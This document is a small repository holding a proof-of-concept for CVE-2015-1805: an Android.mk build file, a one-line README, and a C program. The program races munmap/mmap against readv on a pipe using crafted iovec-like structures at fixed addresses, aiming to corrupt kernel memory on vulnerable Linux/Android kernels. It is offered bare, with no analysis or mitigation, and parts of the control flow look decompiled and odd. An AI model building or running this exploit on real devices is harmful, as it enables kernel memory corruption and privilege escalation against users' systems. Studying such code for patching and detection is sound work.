├── CVE-2015-1805
    ├── Android.mk
    └── CVE-2015-1805.c
└── README.md


/CVE-2015-1805/Android.mk:
--------------------------------------------------------------------------------
 1 | LOCAL_PATH := $(call my-dir)  
 2 | 
 3 | include $(CLEAR_VARS)  
 4 | LOCAL_MODULE := CVE-2015-1805   
 5 | LOCAL_CFLAGS += -pie -fPIE
 6 | LOCAL_LDFLAGS += -pie -fPIE
 7 | LOCAL_SRC_FILES := CVE-2015-1805.c   
 8 | include $(BUILD_EXECUTABLE)  
 9 | 
10 | 


--------------------------------------------------------------------------------
/CVE-2015-1805/CVE-2015-1805.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |   wirte by 少仲
  3 |   email:panyu6325@gmail.com
  4 | */
  5 | 
  6 | #include <unistd.h>
  7 | #include <sys/types.h>
  8 | #include <sys/mman.h>
  9 | #include <fcntl.h>
 10 | #include <stdio.h>
 11 | #include<pthread.h>
 12 | #include <sys/uio.h>
 13 | 
 14 | struct payload
 15 | {
 16 | 	char buf[52];
 17 | 	int total_len;
 18 | 	void *base;
 19 | 	int len;
 20 | };
 21 | 
 22 | int pipe_fd[2];
 23 | void* g_base = NULL;
 24 | 
 25 | 
 26 | void* thread_func1(const char* s)
 27 | {
 28 | 	void* ret_mmap = NULL;
 29 | 	munmap((void*)0x45678000, 0x1000);
 30 | 	ret_mmap = mmap((void*)0x45678000, 0x1000,PROT_READ|PROT_WRITE,50,-1,0);
 31 | 	return ret_mmap;
 32 | }
 33 | 
 34 | void* thread_func2(const char* s)
 35 | {
 36 | 	size_t ret = 0;
 37 | 	ret = readv(pipe_fd[0],g_base,256);
 38 | 	return (void*)ret;
 39 | }
 40 | 
 41 | int trigger()
 42 | {
 43 | 	const char* outstring1 = NULL;
 44 | 	const char* outstring2 = NULL;
 45 | 
 46 | 	int ret = -1;
 47 | 	int map_times = 0;
 48 | 	void* g_map1 = NULL;
 49 | 	void* g_map2 = NULL;
 50 | 	struct payload* pld;
 51 | 	void* buf = NULL;
 52 | 	int n = 0;
 53 | 	int idx = 0;
 54 | 
 55 | 	pthread_t tid1;
 56 | 	pthread_t tid2;
 57 | 
 58 | 	int unmap_addr = 0;
 59 | 
 60 | 	if (pipe(pipe_fd)<0)
 61 | 	{
 62 | 		puts("pipe failed...\n");
 63 | 		return ret;
 64 | 	}
 65 | 
 66 | 	fcntl(pipe_fd[0],F_SETFL,0x800);
 67 | 	fcntl(pipe_fd[1],F_SETFL,0x800);
 68 | 	g_base = malloc(0x800u);
 69 | 	if (!g_base)
 70 | 	{
 71 | 		outstring1 = "malloc failed...\n";
 72 | _failed:
 73 | 		puts(outstring1);
 74 | 		goto _clean;
 75 | 	}
 76 | 
 77 | 	g_map1 = mmap((void*)0x45678000,0x1000,PROT_READ|PROT_WRITE,50,-1,0);
 78 | 	if (g_map1 == (void*)-1)
 79 | 	{
 80 | 		outstring1 = " mmap fixed addr failed...\n";
 81 | 		goto _failed;
 82 | 	}
 83 | 
 84 | 	while( map_times == 7)
 85 | 	{
 86 | _loop:
 87 | 		if ( ++map_times == 256)
 88 | 		{
 89 | 			pld =  g_base;
 90 | 			pld->total_len = 0xA0;
 91 | 			pld->base = g_map1;
 92 | 			pld->len = 0x10;
 93 | 			puts("------------------------------------\n");
 94 | 			puts("           CVE-2015-1805            \n");
 95 | 			puts("------------------------------------\n");
 96 | 			while(1)
 97 | 			{
 98 | 				switch(n)
 99 | 				{
100 | 				case 0:
101 | 				case 4:
102 | 					outstring2 = "\b-";
103 | 					goto _putstr;
104 | 				case 1:
105 | 				case 5:
106 | 					outstring2 = "\b\\";
107 | 					goto _putstr;
108 | 				case 2:
109 | 				case 6:
110 | 					outstring2 = "\b|";
111 | _putstr:
112 | 					puts(outstring2);
113 | 					++n;
114 | 					break;
115 | 				case 3:
116 | 					n = 4;
117 | 					puts("\b/");
118 | 					break;
119 | 				case 7:
120 | 					n = 0;
121 | 					puts("\b/");
122 | 					break;
123 | 				default:
124 | 					break;
125 | 				}
126 | 				
127 | 				write(pipe_fd[1],buf,4096);
128 | 				pthread_create(&tid1,NULL,thread_func1,NULL);
129 | 				pthread_create(&tid2,NULL,thread_func2,NULL);
130 | 				pthread_join(tid1,0);
131 | 				pthread_join(tid2,0);
132 | 			}
133 | 		}
134 | 	}
135 | 	g_map2 = mmap(0,0x1000,PROT_READ|PROT_WRITE,33, -1, 0);
136 | 	*(&buf + map_times) = g_map2;
137 | 	if ( g_map2 != (void *)-1 )
138 | 	{
139 | 		*(unsigned long*)(g_base + 8 * map_times) = g_map2;
140 | 		*(unsigned long*)(g_base + 8 * map_times + 4) = 16;
141 | 		goto _loop;
142 | 	}	
143 | 	printf("mmap failed in %d times\n", map_times);
144 | 
145 | 	do 
146 | 	{
147 | 		unmap_addr = *(int *)((char *)&buf + idx);
148 | 		if ( unmap_addr )
149 | 			munmap((void*)unmap_addr, 0x1000);
150 | 		idx += 4;
151 | 
152 | 	} while (idx != 1024);
153 | 	free(g_base);
154 | _clean:
155 | 	close(pipe_fd[0]);
156 | 	close(pipe_fd[1]);
157 | 	return ret;
158 | }
159 | 
160 | 
161 | int main(int argc,char* argv[])
162 | {
163 | 	int ret = 0;
164 | 	ret = trigger();
165 | 	return ret;
166 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2015-1805 poc
2 | 


--------------------------------------------------------------------------------